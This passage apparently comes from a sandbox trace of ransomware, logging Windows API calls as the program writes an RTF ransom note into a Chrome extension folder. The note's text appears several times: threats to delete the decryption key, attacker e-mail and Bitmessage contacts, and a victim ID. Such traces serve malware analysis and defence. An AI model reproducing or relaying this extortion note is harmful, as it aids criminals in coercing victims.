butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0272.338] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0272.339] CloseHandle (hObject=0x294) returned 1 [0272.339] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\#readme_eman#.rtf")) returned 0xffffffff [0272.339] GetLastError () returned 0x2 [0272.339] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0272.340] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.340] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.340] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r 